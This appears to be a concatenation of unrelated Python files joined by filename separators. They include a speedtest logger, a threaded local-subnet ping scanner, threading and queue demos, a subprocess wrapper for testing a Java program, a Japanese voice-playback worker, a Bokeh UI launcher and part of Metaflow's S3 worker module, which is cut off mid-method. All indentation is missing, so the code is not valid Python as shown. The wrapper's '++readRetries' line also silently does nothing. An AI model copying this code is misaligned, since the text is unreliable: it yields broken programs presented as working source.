speedlog = speedtest.Speedtest()
speedlog.get_servers(servers)
speedlog.get_best_server()
speedlog.download()
speedlog.upload(pre_allocate=False)
print("Current Date: %s %s", str(currentday), str(currenttime))
print("Download: " + str(round(speedlog.results.download / (1000*1000), 2)) + " Mbit/s") # fixed byte to megabit output
print("Upload: " + str(round(speedlog.results.upload / (1000*1000), 2)) + " Mbit/s") # fixed byte to megabit output
print("Ping: " + str(speedlog.results.ping))
print("Timestamp: " + str(speedlog.results.timestamp))
print("Bytes received: " + str(speedlog.results.bytes_received))
print("Bytes sent: " + str(speedlog.results.bytes_sent))
print("Link: " + str(speedlog.results.share()))
download = float(round(speedlog.results.download / (1000*1000), 2)) # fixed byte to megabit output
upload = float(round(speedlog.results.upload / (1000*1000), 2)) # fixed byte to megabit output
ping = float(round(speedlog.results.ping))
bytes_received = float(speedlog.results.bytes_received)
bytes_sent = float(speedlog.results.bytes_sent)
result_pic = str(speedlog.results.share())
params = (getnewrnr(c), currentday, currenttime, download, upload, ping, bytes_received, bytes_sent, result_pic)
c.execute("INSERT INTO results VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)", params)
print("finished speedtest")
# saving the changes
conn.commit()
# downloading the speedtest result as .png to display it in ui later on
# urllib.request.urlretrieve(speedlog.results.share(), str("speedtestresult.png"))
# backup of the database
backup()
except speedtest.SpeedtestException:
print("speedtest failed")
# adding empty entrys due to failure
params = (getnewrnr(c), currentday, currenttime, 0, 0, 0, 0, 0, "")
c.execute("INSERT INTO results VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)", params)
# saving the changes
conn.commit()
if __name__ == '__main__':
speedThread = Thread(target=speedlogger, args=()).start() # speedtestthread
|
network_scan.py
|
#!/usr/bin/env python
##############################################Network Scanner############################################
##############################################Author- Jagmohan Singh(B11062)############################################
####################################################- Rishabh Sahu(B11025)#####################################
###############################################Date-19 November 2014 ###########################################
from threading import Thread
import subprocess
from Queue import Queue
import socket, struct, fcntl
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
def get_ip(iface = 'wlan0'):####################function to get the local ip for wireless
ifreq = struct.pack('16sH14s', iface, socket.AF_INET, '\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
ip=get_ip('wlan0')####getting the ip
ip=ip.split('.')
ip=ip[0]+'.'+ip[1]+'.'+ip[2]+'.'####splitting the ip
num_threads = 20
queue = Queue()
#wraps system ping command
##function to check the status of node
def pinger(i, q):
"""Pings subnet"""
while True:
fp=open("result.dat",'a')
ip = q.get()
print "Thread %s: Pinging %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
fp.write(ip+"\n")
else:
print "%s: did not respond" % ip
q.task_done()
#Spawn thread pool
###thread pools
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
#Place work in queue
for i in range(0,256):
ip1=ip+str(i)
queue.put(ip1)
#Wait until worker threads are done to exit
queue.join()
|
alternative.py
|
import threading as th
th_even = th.Event()
th_odd = th.Event()
def even_foo():
global num
global limit
while num <= limit:
th_even.wait() # true
print('偶数:' + str(num))
num += 1
th_odd.set() # true
th_even.clear() # false
def odd_foo():
global num
global limit
while num <= limit:
th_odd.wait()
print('奇数:' + str(num))
num += 1
th_even.set()
th_odd.clear()
if __name__ == '__main__':
num = 0
limit = 23
t1 = th.Thread(target=even_foo)
t2 = th.Thread(target=odd_foo)
th_even.set()
t1.start()
t2.start()
t1.join()
t2.join()
|
queuetest-gui-class.py
|
"Recoding with classes and bound methods"
# GUI that displays data produced and queued by worker threads (class-based)
import threading, queue, time
from tkinter.scrolledtext import ScrolledText
class ThreadGui(ScrolledText):
threadsPerClick = 4
def __init__(self, parent=None):
ScrolledText.__init__(self, parent)
self.pack()
self.dataQueue = queue.Queue() # infinite size
self.bind('<Button-1>', self.makethreads) # on left mouse click
self.consumer() # queue loop in main thread
def producer(self, id):
for i in range(5):
time.sleep(0.1)
self.dataQueue.put('[producer id=%d, count=%d]' % (id, i))
def consumer(self):
try:
data = self.dataQueue.get(block=False)
except queue.Empty:
pass
else:
self.insert('end', 'consumer got => %s\n' % str(data))
self.see('end')
self.after(100, self.consumer) # 4 times per sec
def makethreads(self, event):
for i in range(self.threadsPerClick):
threading.Thread(target=self.producer, args=(i,)).start()
if __name__ == '__main__':
root = ThreadGui() # in main thread: make GUI, run timer loop
root.mainloop() # pop-up window, enter tk event loop
'''
uses Python’s threading module instead of _thread. This would
normally mean that, unlike the prior version, the program would not exit if any producer
threads are still running, unless they are made daemons manually by setting their
daemon flag to True. Remember that under threading, programs exit when only daemonic
threads remain; the producer threads here inherit a False daemon value from
the thread that creates them, which prevents program exit while they run.
'''
|
pexpect.py
|
import os
import subprocess
import select
import time
import threading
import Queue
def enqueue_output(out, queue):
c = out.read(1)
while 0 < len(c):
queue.put(c)
c = out.read(1)
class pexpect:
def __init__(self):
commandLine = ["java",
"-cp",
"D:\\Drive\\2.Letnik\\4.semester\\Testiranje_in_kakovost\\Izzivi\\Izziv8\\Osnova10\\build\\classes",
"PodatkovnaBaza"]
self.process = subprocess.Popen(commandLine,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.queue = Queue.Queue()
self.thread = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.queue))
self.thread.start()
self.killable = True
def __del__(self):
self.kill()
def kill(self):
if self.killable:
if None == self.process.poll():
self.process.kill()
self.thread.join()
self.killable = False
def expect(self, expectedString):
actualString = ""
readRetries = 0
while (self.queue.empty()):
time.sleep(0.1)
++readRetries
if (readRetries > 100):
self.kill()
assert False
while not self.queue.empty():
actualString += self.queue.get_nowait()
if actualString[-1] == '\n':
break
actualString = actualString.strip('\n\r')
if not actualString == expectedString:
print "\nERROR: Wrong output received:\n\tExpected: '%s'\n\tActual: '%s'\n" % (expectedString, actualString)
self.kill()
assert False
def send(self, inputString):
self.process.stdin.write(inputString + "\n")
|
_v5_proc_playvoice.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# インターフェース
qCtrl_control_speech = 'temp/control_speech.txt'
# 共通ルーチン
import _v5__qRiKi
qRiKi = _v5__qRiKi.qRiKi_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
import _v5__qLog
qLog = _v5__qLog.qLog_class()
qPLATFORM = qRiKi.getValue('qPLATFORM' )
qRUNATTR = qRiKi.getValue('qRUNATTR' )
qHOSTNAME = qRiKi.getValue('qHOSTNAME' )
qUSERNAME = qRiKi.getValue('qUSERNAME' )
qPath_pictures = qRiKi.getValue('qPath_pictures' )
qPath_videos = qRiKi.getValue('qPath_videos' )
qPath_cache = qRiKi.getValue('qPath_cache' )
qPath_sounds = qRiKi.getValue('qPath_sounds' )
qPath_icons = qRiKi.getValue('qPath_icons' )
qPath_fonts = qRiKi.getValue('qPath_fonts' )
qPath_log = qRiKi.getValue('qPath_log' )
qPath_work = qRiKi.getValue('qPath_work' )
qPath_rec = qRiKi.getValue('qPath_rec' )
qPath_s_ctrl = qRiKi.getValue('qPath_s_ctrl' )
qPath_s_inp = qRiKi.getValue('qPath_s_inp' )
qPath_s_wav = qRiKi.getValue('qPath_s_wav' )
qPath_s_jul = qRiKi.getValue('qPath_s_jul' )
qPath_s_STT = qRiKi.getValue('qPath_s_STT' )
qPath_s_TTS = qRiKi.getValue('qPath_s_TTS' )
qPath_s_TRA = qRiKi.getValue('qPath_s_TRA' )
qPath_s_play = qRiKi.getValue('qPath_s_play' )
qPath_v_ctrl = qRiKi.getValue('qPath_v_ctrl' )
qPath_v_inp = qRiKi.getValue('qPath_v_inp' )
qPath_v_jpg = qRiKi.getValue('qPath_v_jpg' )
qPath_v_detect = qRiKi.getValue('qPath_v_detect' )
qPath_v_cv = qRiKi.getValue('qPath_v_cv' )
qPath_v_photo = qRiKi.getValue('qPath_v_photo' )
qPath_v_msg = qRiKi.getValue('qPath_v_msg' )
qPath_d_ctrl = qRiKi.getValue('qPath_d_ctrl' )
qPath_d_play = qRiKi.getValue('qPath_d_play' )
qPath_d_prtscn = qRiKi.getValue('qPath_d_prtscn' )
qPath_d_movie = qRiKi.getValue('qPath_d_movie' )
qPath_d_upload = qRiKi.getValue('qPath_d_upload' )
qBusy_dev_cpu = qRiKi.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qRiKi.getValue('qBusy_dev_com' )
qBusy_dev_mic = qRiKi.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qRiKi.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qRiKi.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qRiKi.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qRiKi.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qRiKi.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qRiKi.getValue('qBusy_s_inp' )
qBusy_s_wav = qRiKi.getValue('qBusy_s_wav' )
qBusy_s_STT = qRiKi.getValue('qBusy_s_STT' )
qBusy_s_TTS = qRiKi.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qRiKi.getValue('qBusy_s_TRA' )
qBusy_s_play = qRiKi.getValue('qBusy_s_play' )
qBusy_v_ctrl = qRiKi.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qRiKi.getValue('qBusy_v_inp' )
qBusy_v_QR = qRiKi.getValue('qBusy_v_QR' )
qBusy_v_jpg = qRiKi.getValue('qBusy_v_jpg' )
qBusy_v_CV = qRiKi.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qRiKi.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qRiKi.getValue('qBusy_d_inp' )
qBusy_d_QR = qRiKi.getValue('qBusy_d_QR' )
qBusy_d_rec = qRiKi.getValue('qBusy_d_rec' )
qBusy_d_telework = qRiKi.getValue('qBusy_d_telework' )
qBusy_d_play = qRiKi.getValue('qBusy_d_play' )
qBusy_d_browser = qRiKi.getValue('qBusy_d_browser' )
qBusy_d_upload = qRiKi.getValue('qBusy_d_upload' )
qRdy__s_force = qRiKi.getValue('qRdy__s_force' )
qRdy__s_fproc = qRiKi.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qRiKi.getValue('qRdy__s_sendkey' )
qRdy__v_mirror = qRiKi.getValue('qRdy__v_mirror' )
qRdy__v_reader = qRiKi.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qRiKi.getValue('qRdy__v_sendkey' )
qRdy__d_reader = qRiKi.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qRiKi.getValue('qRdy__d_sendkey' )
class proc_playvoice:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777', ):
self.path = qPath_s_play
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=5, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# ログ
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# 初期設定
self.proc_step = '1'
# 待機ループ
self.proc_step = '5'
while (self.proc_step == '5'):
self.proc_beat = time.time()
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# キュー取得
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# レディ設定
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# ステータス応答
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
# 処理
path = self.path
path_files = glob.glob(path + '*')
path_files.sort()
#if (len(path_files) > 0):
# フォルダ読み直しループ
while (len(path_files) > 0):
#try:
if (True):
# 音声入力中
if (self.micType == 'bluetooth'):
if (len(glob.glob(qPath_s_inp + '*')) == 0):
qFunc.statusWait_false(qBusy_s_inp, 3)
chktime = time.time()
while (len(glob.glob(qPath_s_inp + '*')) > 0) and ((time.time() - chktime) < 3):
qLog.log('info', self.proc_id, 'voice input waiting !', display=self.logDisp,)
time.sleep(0.50)
for f in path_files:
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
proc_file = f.replace('\\', '/')
if (proc_file[-4:].lower() == '.wav' and proc_file[-8:].lower() != '.wrk.wav'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.wav'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-4:].lower() == '.mp3' and proc_file[-8:].lower() != '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.mp3'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-8:].lower() == '.wrk.wav' or proc_file[-8:].lower() == '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-8] + proc_file[-4:]
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
# 実行カウンタ
self.proc_last = time.time()
self.proc_seq += 1
if (self.proc_seq > 9999):
self.proc_seq = 1
seq4 = '{:04}'.format(self.proc_seq)
seq2 = '{:02}'.format(self.proc_seq)
proc_name = proc_file.replace(path, '')
proc_name = proc_name[:-4]
work_name = self.proc_id + '.' + seq2
work_file = qPath_work + work_name + '.mp3'
if (os.path.exists(work_file)):
os.remove(work_file)
sox = subprocess.Popen(['sox', '-q', proc_file, '-r', '16000', '-b', '16', '-c', '1', work_file, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (os.path.exists(work_file)):
if (self.micDev.isdigit()):
os.remove(proc_file)
# ログ
if (self.runMode == 'debug') or (not self.micDev.isdigit()):
qLog.log('info', self.proc_id, '' + proc_name + u' → ' + work_name, display=self.logDisp,)
# 結果出力
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = work_file
cn_s.put([out_name, out_value])
# ビジー設定
if (qFunc.statusCheck(self.fileBsy) == False):
qFunc.statusSet(self.fileBsy, True)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, True)
if (self.micType == 'bluetooth') \
or (self.micGuide == 'on' or self.micGuide == 'sound'):
qFunc.statusWait_false(qBusy_s_inp, 3)
# 音声再生
if (qFunc.statusCheck(qBusy_dev_spk) == True):
qLog.log('info', 'spk_busy!_:' + work_name, )
else:
sox=subprocess.Popen(['sox', '-q', work_file, '-d', '--norm', ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#if (self.runMode == 'debug') \
#or (self.runMode == 'hud') \
#or (self.runMode == 'live') \
#or (self.runMode == 'translator'):
if (self.runMode != 'speech'):
sox.wait()
sox.terminate()
sox = None
time.sleep(0.50)
break #1つ再生したらフォルダ読み直し
#except Exception as e:
# pass
# フォルダ読み直し
path_files = glob.glob(path + '*')
path_files.sort()
# ビジー解除
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, False)
# バッチ実行時は終了
if (not self.micDev.isdigit()):
break
# アイドリング
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (qFunc.statusCheck(qBusy_dev_spk) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
# 終了処理
if (True):
# レディ解除
qFunc.statusSet(self.fileRdy, False)
# ビジー解除
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, False)
# キュー削除
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# ログ
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
if __name__ == '__main__':
# 共通クラス
qRiKi.init()
qFunc.init()
# ログ
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
# 初期設定
qFunc.remove(qCtrl_control_speech)
qRiKi.statusReset_speech(False)
# パラメータ
runMode = 'debug'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
# 開始
playvoice_thread = proc_playvoice('playvoice', '0', runMode, )
playvoice_thread.begin()
# テスト実行
if (len(sys.argv) < 2):
qFunc.copy('_sounds/_sound_hallo.wav', qPath_s_play + '_sound_hallo.wav')
chktime = time.time()
while ((time.time() - chktime) < 15):
res_data = playvoice_thread.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name != ''):
print(res_name, res_value, )
if (playvoice_thread.proc_s.qsize() == 0):
playvoice_thread.put(['_status_', ''])
time.sleep(0.05)
# 単体実行
if (len(sys.argv) >= 2):
# 待機ループ
while (True):
# 終了確認
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_speech)
if (txts != False):
qLog.log('info', str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_speech)
control = txt
# メッセージ
res_data = playvoice_thread.get()
res_name = res_data[0]
res_value = res_data[1]
#if (res_name != ''):
# print(res_name, res_value, )
time.sleep(0.50)
# 終了
playvoice_thread.abort()
del playvoice_thread
|
application.py
|
import json
import logging
import multiprocessing
import os
import socket
import sys
import bokeh
import distributed.bokeh
from ..utils import ignoring
dirname = os.path.dirname(distributed.__file__)
paths = [os.path.join(dirname, 'bokeh', name)
for name in ['status', 'tasks', 'workers']]
binname = 'bokeh.exe' if sys.platform.startswith('win') else 'bokeh'
binname = os.path.join(os.path.dirname(sys.argv[0]), binname)
logger = logging.getLogger(__file__)
dask_dir = os.path.join(os.path.expanduser('~'), '.dask')
if not os.path.exists(dask_dir):
os.mkdir(dask_dir)
class BokehWebInterface(object):
def __init__(self, host='127.0.0.1', http_port=9786, tcp_port=8786,
bokeh_port=8787, bokeh_whitelist=[], log_level='critical',
show=False, prefix=None, use_xheaders=False, quiet=True):
self.port = bokeh_port
ip = socket.gethostbyname(host)
hosts = ['localhost',
'127.0.0.1',
ip,
host]
with ignoring(Exception):
hosts.append(socket.gethostbyname(ip))
with ignoring(Exception):
hosts.append(socket.gethostbyname(socket.gethostname()))
hosts = ['%s:%d' % (h, bokeh_port) for h in hosts]
hosts.append("*")
hosts.extend(map(str, bokeh_whitelist))
args = ([binname, 'serve'] + paths +
['--log-level', 'warning',
'--check-unused-sessions=50',
'--unused-session-lifetime=1',
'--port', str(bokeh_port)] +
sum([['--host', h] for h in hosts], []))
if prefix:
args.extend(['--prefix', prefix])
if show:
args.append('--show')
if use_xheaders:
args.append('--use-xheaders')
if log_level in ('debug', 'info', 'warning', 'error', 'critical'):
args.extend(['--log-level', log_level])
bokeh_options = {'host': host,
'http-port': http_port,
'tcp-port': tcp_port,
'bokeh-port': bokeh_port}
with open(os.path.join(dask_dir, '.dask-web-ui.json'), 'w') as f:
json.dump(bokeh_options, f, indent=2)
if sys.version_info[0] >= 3:
ctx = multiprocessing.get_context('spawn')
self.process = ctx.Process(target=bokeh_main, args=(args,), daemon=True)
self.process.start()
else:
import subprocess
self.process = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if not quiet:
logger.info(" Bokeh UI at: http://%s:%d/status/"
% (ip, bokeh_port))
def close(self, join=True, timeout=None):
if sys.version_info[0] >= 3:
try:
if self.process.is_alive():
self.process.terminate()
except AssertionError:
self.process.terminate()
if join:
self.process.join(timeout=timeout)
else:
if self.process.returncode is None:
self.process.terminate()
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def bokeh_main(args):
from bokeh.command.bootstrap import main
import logging
logger = logging.getLogger('bokeh').setLevel(logging.CRITICAL)
main(args)
|
s3op.py
|
from __future__ import print_function
import json
import time
import math
import sys
import os
import traceback
from hashlib import sha1
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
from itertools import starmap, chain, islice
from boto3.s3.transfer import TransferConfig
try:
# python2
from urlparse import urlparse
from Queue import Full as QueueFull
except:
# python3
from urllib.parse import urlparse
from queue import Full as QueueFull
# s3op can be launched as a stand-alone script. We must set
# PYTHONPATH for the parent Metaflow explicitly.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
from metaflow._vendor import click
# we use Metaflow's parallel_imap_unordered instead of
# multiprocessing.Pool because https://bugs.python.org/issue31886
from metaflow.util import TempDir, url_quote, url_unquote
from metaflow.multicore_utils import parallel_map
from metaflow.datatools.s3util import aws_retry, read_in_chunks, get_timestamp
NUM_WORKERS_DEFAULT = 64
DOWNLOAD_FILE_THRESHOLD = 2 * TransferConfig().multipart_threshold
DOWNLOAD_MAX_CHUNK = 2 * 1024 * 1024 * 1024 - 1
class S3Url(object):
def __init__(
self,
bucket,
path,
url,
local,
prefix,
content_type=None,
metadata=None,
range=None,
):
self.bucket = bucket
self.path = path
self.url = url
self.local = local
self.prefix = prefix
self.content_type = content_type
self.metadata = metadata
self.range = range
def __str__(self):
return self.url
# We use error codes instead of Exceptions, which are trickier to
# handle reliably in a multi-process world
ERROR_INVALID_URL = 4
ERROR_NOT_FULL_PATH = 5
ERROR_URL_NOT_FOUND = 6
ERROR_URL_ACCESS_DENIED = 7
ERROR_WORKER_EXCEPTION = 8
ERROR_VERIFY_FAILED = 9
ERROR_LOCAL_FILE_NOT_FOUND = 10
def format_triplet(prefix, url="", local=""):
return u" ".join(url_quote(x).decode("utf-8") for x in (prefix, url, local))
# I can't understand what's the right way to deal
# with boto errors. This function can be replaced
# with better error handling code.
def normalize_client_error(err):
error_code = err.response["Error"]["Code"]
try:
return int(error_code)
except ValueError:
if error_code in ("AccessDenied", "AllAccessDisabled"):
return 403
if error_code == "NoSuchKey":
return 404
return error_code
# S3 worker pool
def worker(result_file_name, queue, mode):
# Interpret mode, it can either be a single op or something like
# info_download or info_upload which implies:
# - for download: we need to return the information as well
# - for upload: we need to not overwrite the file if it exists
modes = mode.split("_")
pre_op_info = False
if len(modes) > 1:
pre_op_info = True
mode = modes[1]
else:
mode = modes[0]
def op_info(url):
try:
head = s3.head_object(Bucket=url.bucket, Key=url.path)
to_return = {
"error": None,
"size": head["ContentLength"],
"content_type": head["ContentType"],
"metadata": head["Metadata"],
"last_modified": get_timestamp(head["LastModified"]),
}
except client_error as err:
error_code = normalize_client_error(err)
if error_code == 404:
to_return = {"error": ERROR_URL_NOT_FOUND, "raise_error": err}
elif error_code == 403:
to_return = {"error": ERROR_URL_ACCESS_DENIED, "raise_error": err}
else:
to_return = {"error": error_code, "raise_error": err}
return to_return
with open(result_file_name, "w") as result_file:
try:
from metaflow.datatools.s3util import get_s3_client
s3, client_error = get_s3_client()
while True:
url, idx = queue.get()
if url is None:
break
if mode == "info":
result = op_info(url)
orig_error = result.get("raise_error", None)
if orig_error:
del result["raise_error"]
with open(url.local, "w") as f:
json.dump(result, f)
elif mode == "download":
tmp = NamedTemporaryFile(dir=".", mode="wb", delete=False)
try:
if url.range:
resp = s3.get_object(
Bucket=url.bucket, Key=url.path, Range=url.range
)
else:
resp = s3.get_object(Bucket=url.bucket, Key=url.path)
sz = resp["ContentLength"]
if not url.range and sz > DOWNLOAD_FILE_THRESHOLD:
# In this case, it is more efficient to use download_file as it
# will download multiple parts in parallel (it does it after
# multipart_threshold)
s3.download_file(url.bucket, url.path, tmp.name)
else:
read_in_chunks(tmp, resp["Body"], sz, DOWNLOAD_MAX_CHUNK)
tmp.close()
os.rename(tmp.name, url.local)
except client_error as err:
tmp.close()
os.unlink(tmp.name)
error_code = normalize_client_error(err)
if error_code == 404:
result_file.write("%d %d\n" % (idx, -ERROR_URL_NOT_FOUND))
continue
elif error_code == 403:
result_file.write(
"%d %d\n" % (idx, -ERROR_URL_ACCESS_DENIED)
)
continue
else:
raise
# TODO specific error message for out of disk space
# If we need the metadata, get it and write it out
if pre_op_info:
with open("%s_meta" % url.local, mode="w") as f:
args = {"size": resp["ContentLength"]}
if resp["ContentType"]:
args["content_type"] = resp["ContentType"]
if resp["Metadata"] is not None:
args["metadata"] = resp["Metadata"]
if resp["LastModified"]:
args["last_modified"] = get_timestamp(
resp["LastModified"]
)
json.dump(args, f)
# Finally, we push out the size to the result_pipe since
# the size is used for verification and other purposes and
# we want to avoid file operations for this simple process
result_file.write("%d %d\n" % (idx, resp["ContentLength"]))
else:
# This is upload, if we have a pre_op, it means we do not
# want to overwrite
do_upload = False
if pre_op_info:
result_info = op_info(url)
if result_info["error"] == ERROR_URL_NOT_FOUND:
# We only upload if the file is not found
do_upload = True
else:
# No pre-op so we upload
do_upload = True
if do_upload:
extra = None
if url.content_type or url.metadata:
extra = {}
if url.content_type:
extra["ContentType"] = url.content_type
if url.metadata is not None:
extra["Metadata"] = url.metadata
s3.upload_file(url.local, url.bucket, url.path, ExtraArgs=extra)
# We indicate that the file was uploaded
result_file.write("%d %d\n" % (idx, 0))
except:
traceback.print_exc()
sys.exit(ERROR_WORKER_EXCEPTION)
def start_workers(mode, urls, num_workers):
# We start the minimum of len(urls) or num_workers to avoid starting
# workers that will definitely do nothing
num_workers = min(num_workers, len(urls))
queue = Queue(len(urls) + num_workers)
procs = {}
# 1. push sources and destinations to the queue
for idx, elt in enumerate(urls):
queue.put((elt, idx))
# 2. push end-of-queue markers
for i in range(num_workers):
queue.put((None, None))
# 3. Prepare the result structure
sz_results = [None] * len(urls)
# 4. start processes
with TempDir() as output_dir:
for i in range(num_workers):
file_path = os.path.join(output_dir, str(i))
p = Process(target=worker, args=(file_path, queue, mode))
p.start()
procs[p] = file_path
# 5. wait for the processes to finish; we continuously update procs
# to remove all processes that have finished already
while procs:
new_procs = {}
for proc, out_path in procs.items():
proc.join(timeout=1)
if proc.exitcode is not None:
if proc.exitcode != 0:
msg = "Worker process failed (exit code %d)" % proc.exitcode
exit(msg, proc.exitcode)
# Read the output file if all went well
with open(out_path, "r") as out_file:
for line in out_file:
line_split = line.split(" ")
sz_results[int(line_split[0])] = int(line_split[1])
else:
# Put this process back in the processes to check
new_procs[proc] = out_path
procs = new_procs
return sz_results
def process_urls(mode, urls, verbose, num_workers):
if verbose:
print("%sing %d files.." % (mode.capitalize(), len(urls)), file=sys.stderr)
start = time.time()
sz_results = start_workers(mode, urls, num_workers)
end = time.time()
if verbose:
total_size = sum(sz for sz in sz_results if sz is not None and sz > 0)
bw = total_size / (end - start)
print(
"%sed %d files, %s in total, in %d seconds (%s/s)."
% (
mode.capitalize(),
len(urls),
with_unit(total_size),
end - start,
with_unit(bw),
),
file=sys.stderr,
)
return sz_results
# Utility functions
def with_unit(x):
if x > 1024 ** 3:
return "%.1fGB" % (x / 1024.0 ** 3)
elif x > 1024 ** 2:
return "%.1fMB" % (x / 1024.0 ** 2)
elif x > 1024:
return "%.1fKB" % (x / 1024.0)
else:
return "%d bytes" % x
# S3Ops class is just a wrapper for get_size and list_prefix
# required by @aws_retry decorator, which needs the reset_client
# method. Otherwise they would be just stand-alone functions.
class S3Ops(object):
def __init__(self):
self.s3 = None
self.client_error = None
def reset_client(self, hard_reset=False):
from metaflow.datatools.s3util import get_s3_client
if hard_reset or self.s3 is None:
